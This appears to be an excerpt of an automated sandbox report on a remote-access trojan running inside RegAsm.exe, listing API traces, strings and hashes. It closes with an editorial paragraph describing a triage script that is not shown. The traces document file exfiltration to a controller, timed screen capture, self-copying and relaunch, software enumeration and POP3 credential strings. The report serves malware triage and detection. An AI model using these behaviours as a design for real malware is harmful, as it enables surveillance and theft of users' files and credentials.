• PathFileExistsW.SHLWAPI(00000000), ref: 0041B21F
• mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041B260
• mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041B278
• mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041B28D
• SetEvent.KERNEL32 ref: 0041B2AA
• WaitForSingleObject.KERNEL32(000001F4), ref: 0041B2BB
• CloseHandle.KERNEL32 ref: 0041B2CB
• mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041B2ED
• mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041B2F7
Strings
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
• String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$NG
• API String ID: 738084811-2094122233
• Opcode ID: d2db031e3b1df8eedd793174f912beb473d8d97f533f0dd4154628810b81d940
• Instruction ID: 904a2ea9ee052b7cd0d2885f28b370526ea16529c5f4723dacad6ab52bd59ce6
                                                                                                                                                                                                  • Opcode Fuzzy Hash: d2db031e3b1df8eedd793174f912beb473d8d97f533f0dd4154628810b81d940
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 015193B12842056ED314B731DC96ABF779CDB80359F10053FB246621E2EF789D498AAE
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                                                                                                                                                                                                  • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401B03
                                                                                                                                                                                                  • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401B13
                                                                                                                                                                                                  • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401B23
                                                                                                                                                                                                  • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401B33
                                                                                                                                                                                                  • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401B43
                                                                                                                                                                                                  • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B54
                                                                                                                                                                                                  • WriteFile.KERNEL32(00000000,00472AAA,00000002,00000000,00000000), ref: 00401B65
                                                                                                                                                                                                  • WriteFile.KERNEL32(00000000,00472AAC,00000004,00000000,00000000), ref: 00401B75
                                                                                                                                                                                                  • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401B85
                                                                                                                                                                                                  • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B96
                                                                                                                                                                                                  • WriteFile.KERNEL32(00000000,00472AB6,00000002,00000000,00000000), ref: 00401BA7
                                                                                                                                                                                                  • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401BB7
                                                                                                                                                                                                  • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401BC7
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: File$Write$Create
                                                                                                                                                                                                  • String ID: RIFF$WAVE$data$fmt
                                                                                                                                                                                                  • API String ID: 1602526932-4212202414
                                                                                                                                                                                                  • Opcode ID: bdde9fe629d6d0b3cb01441b1d036ed99aff71c5e0b2c5a0236a53ffdd76988e
                                                                                                                                                                                                  • Instruction ID: e437df56db769974f3bb03b9acf3047b6271bea3308615ff466a61b001f8e6b8
                                                                                                                                                                                                  • Opcode Fuzzy Hash: bdde9fe629d6d0b3cb01441b1d036ed99aff71c5e0b2c5a0236a53ffdd76988e
                                                                                                                                                                                                  • Instruction Fuzzy Hash: D1413F72644218BAE210DB51DD85FBB7FECEB89B50F40441AFA44D60C0E7A5E909DBB3
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000001,00407688,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000003,004076B0,004752D8,00407709), ref: 004072BF
                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 004072C8
                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 004072DD
                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 004072E0
                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 004072F1
                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 004072F4
                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 00407305
                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00407308
                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 00407319
                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0040731C
                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 0040732D
                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00407330
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: AddressHandleModuleProc
                                                                                                                                                                                                  • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                                                                                                                                                                                                  • API String ID: 1646373207-255920310
                                                                                                                                                                                                  • Opcode ID: f3da3711bb85931ca03a42678d4c0c1881451176f862cc8ba737a85fa656c6e8
                                                                                                                                                                                                  • Instruction ID: 405170eedd050388d8f538cead316ce70cca9a1d875d15a5a69166cce564cbe9
                                                                                                                                                                                                  • Opcode Fuzzy Hash: f3da3711bb85931ca03a42678d4c0c1881451176f862cc8ba737a85fa656c6e8
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0A0152A0E4431676D711AF7AAC44D577E9D9E41351311487BB405E2292EEBCE800CD6E
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.953391796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.953386992.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.953391796.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _strlen
                                                                                                                                                                                                  • String ID: Acco$Acco$POP3$POP3$Pass$Pass$t$t$un$un$word$word
                                                                                                                                                                                                  • API String ID: 4218353326-3023110444
                                                                                                                                                                                                  • Opcode ID: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                                                                                                                                                                  • Instruction ID: bb93a2ec4ecc4c0c7ac40ef0fbf5621e946fdf476ba73097d2750e43d9e064ca
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 69612475D04218ABFF11CBE4C851BDEB7F9EF45280F00409AE604A7299EF706A45CF96
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _free$Info
                                                                                                                                                                                                  • String ID: t'`/
                                                                                                                                                                                                  • API String ID: 2509303402-2084328917
                                                                                                                                                                                                  • Opcode ID: 265d55c29888f35ec20f5081f159e7cd252a50d65c59893da787bb4e51b2451e
                                                                                                                                                                                                  • Instruction ID: 03d8b0dccc9171d7b4ee81f85837dfa1205ba0d7832ce976ccf3d084d520ac26
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 265d55c29888f35ec20f5081f159e7cd252a50d65c59893da787bb4e51b2451e
                                                                                                                                                                                                  • Instruction Fuzzy Hash: AFB1CE719002059FEB21DF69C881BEEBBF4BF09304F15842EF495A7242DB79AC458B69
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 0040CE42
                                                                                                                                                                                                  • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,004750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040CE5B
                                                                                                                                                                                                  • CopyFileW.KERNEL32 ref: 0040CF0B
                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 0040CF21
                                                                                                                                                                                                  • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040CFA9
                                                                                                                                                                                                  • CopyFileW.KERNEL32 ref: 0040CFBF
                                                                                                                                                                                                  • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFFE
                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 0040D001
                                                                                                                                                                                                  • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040D018
                                                                                                                                                                                                  • CloseHandle.KERNEL32 ref: 0040D068
                                                                                                                                                                                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000001), ref: 0040D086
                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 0040D09D
Strings
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
• String ID: 6$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$del$open
• API String ID: 1579085052-2309681474
APIs
• lstrlenW.KERNEL32(?), ref: 0041C0C7
• _memcmp.LIBVCRUNTIME ref: 0041C0DF
• lstrlenW.KERNEL32(?), ref: 0041C0F8
• FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041C133
• GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041C146
• QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041C18A
• lstrcmpW.KERNEL32(?,?), ref: 0041C1A5
• FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041C1BD
• _wcslen.LIBCMT ref: 0041C1CC
• FindVolumeClose.KERNEL32(?), ref: 0041C1EC
• GetLastError.KERNEL32 ref: 0041C204
• GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041C231
• lstrcatW.KERNEL32(?,?), ref: 0041C24A
• lstrcpyW.KERNEL32(?,?), ref: 0041C259
• GetLastError.KERNEL32 ref: 0041C261
Strings
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
• String ID: ?
• API String ID: 3941738427-1684325040
APIs
Strings
Memory Dump Source
• Source File: 0000000D.00000002.953391796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000D.00000002.953386992.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000D.00000002.953391796.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
Similarity
• API ID: _strlen
• String ID: %m$~$Gon~$~F@7$~dra
• API String ID: 4218353326-230879103
APIs
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: _free$EnvironmentVariable
• String ID:
• API String ID: 1464849758-0
APIs
• RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041C742
• RegEnumKeyExA.ADVAPI32 ref: 0041C786
• RegCloseKey.ADVAPI32(?), ref: 0041CA50
Strings
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: CloseEnumOpen
• String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
• API String ID: 1332880857-3714951968
APIs
• DefWindowProcA.USER32(?,00000401,?,?), ref: 0041D66B
• GetCursorPos.USER32(?), ref: 0041D67A
• SetForegroundWindow.USER32(?), ref: 0041D683
• TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041D69D
• Shell_NotifyIconA.SHELL32(00000002,00474B48), ref: 0041D6EE
• ExitProcess.KERNEL32 ref: 0041D6F6
• CreatePopupMenu.USER32 ref: 0041D6FC
• AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041D711
Strings
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
• String ID: Close
• API String ID: 1657328048-3535843008
APIs
• CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00408D1E
• GetFileSizeEx.KERNEL32(00000000,?), ref: 00408D56
• __aulldiv.LIBCMT ref: 00408D88
  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
• SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 00408EAB
• ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408EC6
• CloseHandle.KERNEL32(00000000), ref: 00408F9F
• CloseHandle.KERNEL32(00000000), ref: 00408FE9
• CloseHandle.KERNEL32(00000000), ref: 00409037
Strings
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
                                                                                                                                                                                                  • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $NG
                                                                                                                                                                                                  • API String ID: 3086580692-2582957567
                                                                                                                                                                                                  • Opcode ID: 3991cb73806a49c5ac684c1e5fded63b8ae94927034fce3271c358c0f33b2713
                                                                                                                                                                                                  • Instruction ID: 3fce176daff91a8ac67d7e00268aa6ddaa8eb0a69c3dc15cdf5b3728eb075172
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3991cb73806a49c5ac684c1e5fded63b8ae94927034fce3271c358c0f33b2713
                                                                                                                                                                                                  • Instruction Fuzzy Hash: CCB1A1316083409BC314FB26C941AAFB7E5AFC4358F40492FF589622D2EF789945CB8B
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • ___free_lconv_mon.LIBCMT ref: 10007D06
                                                                                                                                                                                                    • Part of subcall function 100090BA: _free.LIBCMT ref: 100090D7
                                                                                                                                                                                                    • Part of subcall function 100090BA: _free.LIBCMT ref: 100090E9
                                                                                                                                                                                                    • Part of subcall function 100090BA: _free.LIBCMT ref: 100090FB
                                                                                                                                                                                                    • Part of subcall function 100090BA: _free.LIBCMT ref: 1000910D
                                                                                                                                                                                                    • Part of subcall function 100090BA: _free.LIBCMT ref: 1000911F
                                                                                                                                                                                                    • Part of subcall function 100090BA: _free.LIBCMT ref: 10009131
                                                                                                                                                                                                    • Part of subcall function 100090BA: _free.LIBCMT ref: 10009143
                                                                                                                                                                                                    • Part of subcall function 100090BA: _free.LIBCMT ref: 10009155
                                                                                                                                                                                                    • Part of subcall function 100090BA: _free.LIBCMT ref: 10009167
                                                                                                                                                                                                    • Part of subcall function 100090BA: _free.LIBCMT ref: 10009179
                                                                                                                                                                                                    • Part of subcall function 100090BA: _free.LIBCMT ref: 1000918B
                                                                                                                                                                                                    • Part of subcall function 100090BA: _free.LIBCMT ref: 1000919D
                                                                                                                                                                                                    • Part of subcall function 100090BA: _free.LIBCMT ref: 100091AF
                                                                                                                                                                                                  • _free.LIBCMT ref: 10007CFB
                                                                                                                                                                                                    • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
                                                                                                                                                                                                    • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                                                                                                                  • _free.LIBCMT ref: 10007D1D
                                                                                                                                                                                                  • _free.LIBCMT ref: 10007D32
                                                                                                                                                                                                  • _free.LIBCMT ref: 10007D3D
                                                                                                                                                                                                  • _free.LIBCMT ref: 10007D5F
                                                                                                                                                                                                  • _free.LIBCMT ref: 10007D72
                                                                                                                                                                                                  • _free.LIBCMT ref: 10007D80
                                                                                                                                                                                                  • _free.LIBCMT ref: 10007D8B
                                                                                                                                                                                                  • _free.LIBCMT ref: 10007DC3
                                                                                                                                                                                                  • _free.LIBCMT ref: 10007DCA
                                                                                                                                                                                                  • _free.LIBCMT ref: 10007DE7
                                                                                                                                                                                                  • _free.LIBCMT ref: 10007DFF
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.953391796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.953386992.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.953391796.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 161543041-0
                                                                                                                                                                                                  • Opcode ID: 04f87de51616aa77c632626b63215b7c3e2981daeb02be256c48a4a07a0be686
                                                                                                                                                                                                  • Instruction ID: 6de9b84f5b51ee4e35cbeb1ed48e08772f21b212059d2ac72beb9c863e9ed859
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 04f87de51616aa77c632626b63215b7c3e2981daeb02be256c48a4a07a0be686
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 90313931A04645EFFB21DA38E941B6A77FAFF002D1F11446AE84DDB159DE3ABC809B14
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • ___free_lconv_mon.LIBCMT ref: 0045138A
                                                                                                                                                                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 0045059F
                                                                                                                                                                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 004505B1
                                                                                                                                                                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 004505C3
                                                                                                                                                                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 004505D5
                                                                                                                                                                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 004505E7
                                                                                                                                                                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 004505F9
                                                                                                                                                                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 0045060B
                                                                                                                                                                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 0045061D
                                                                                                                                                                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 0045062F
                                                                                                                                                                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 00450641
                                                                                                                                                                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 00450653
                                                                                                                                                                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 00450665
                                                                                                                                                                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 00450677
                                                                                                                                                                                                  • _free.LIBCMT ref: 0045137F
                                                                                                                                                                                                    • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
                                                                                                                                                                                                    • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                                                                                                                                                  • _free.LIBCMT ref: 004513A1
                                                                                                                                                                                                  • _free.LIBCMT ref: 004513B6
                                                                                                                                                                                                  • _free.LIBCMT ref: 004513C1
                                                                                                                                                                                                  • _free.LIBCMT ref: 004513E3
                                                                                                                                                                                                  • _free.LIBCMT ref: 004513F6
                                                                                                                                                                                                  • _free.LIBCMT ref: 00451404
                                                                                                                                                                                                  • _free.LIBCMT ref: 0045140F
                                                                                                                                                                                                  • _free.LIBCMT ref: 00451447
                                                                                                                                                                                                  • _free.LIBCMT ref: 0045144E
                                                                                                                                                                                                  • _free.LIBCMT ref: 0045146B
                                                                                                                                                                                                  • _free.LIBCMT ref: 00451483
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 161543041-0
                                                                                                                                                                                                  • Opcode ID: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                                                                                                                                                                                  • Instruction ID: 2428002f6fd8eb1a99257b9b861ac38f7c05b5b97acacff09fd9d8cf260fe807
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 403193715003009FEB20AA39D846F5B73E8EF02315F62992FE849D7662DF78AD44C729
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 0041A04A
                                                                                                                                                                                                  • GdiplusStartup.GDIPLUS(00474ACC,?,00000000), ref: 0041A07C
                                                                                                                                                                                                  • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 0041A108
                                                                                                                                                                                                  • Sleep.KERNEL32(000003E8), ref: 0041A18E
                                                                                                                                                                                                  • GetLocalTime.KERNEL32(?), ref: 0041A196
                                                                                                                                                                                                  • Sleep.KERNEL32(00000000,00000018,00000000), ref: 0041A285
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                                                                                                                                                                                  • String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i$PG$PG$PG
                                                                                                                                                                                                  • API String ID: 489098229-1431523004
                                                                                                                                                                                                  • Opcode ID: a9a564c4fa78c27a57715e2126324e45245b8a766e259b72a025c3b0d3967f40
                                                                                                                                                                                                  • Instruction ID: 12d64888f2a2aa40a87de1a625a26b3edd7a2139bf4817292c9f8cf1352d8a2d
                                                                                                                                                                                                  • Opcode Fuzzy Hash: a9a564c4fa78c27a57715e2126324e45245b8a766e259b72a025c3b0d3967f40
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7A517D70A002159ACB14BBB5C8529FD77A9AF54308F40407FF509AB1E2EF7C9D85C799
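The function summaries above list each recovered API with its module and call site, with helper routines shown as subcalls, followed by the strings referenced from the same function. Read together they give a behavioural signature that is more useful for triage than the fuzzy hashes: a SetFilePointerEx/ReadFile/send loop whose status string is "Uploading file to Controller: " (chunked file exfiltration to the C2), and a GDI+ routine that creates a directory, sleeps, reads the local time and formats "time_%04i%02i%02i_%02i%02i%02i" / "wnd_..." names (timestamped screen captures). The Python script below is an added example, not Joe Sandbox code and not part of this report: it parses blocks in this exact layout into API sets, arguments and strings and tags the behaviours. The sample input is constructed in the report's layout from API lines of the kind the report lists (including a GetModuleFileNameW/ShellExecuteW/ExitProcess relaunch pattern and a RegOpenKeyExA on HKEY_CURRENT_USER, 0x80000001), trimmed, and one block is deliberately cut off after "Strings" to exercise the missing-metadata path. The tag names and matching rules are the editor's own assumptions, not Joe Sandbox signatures.

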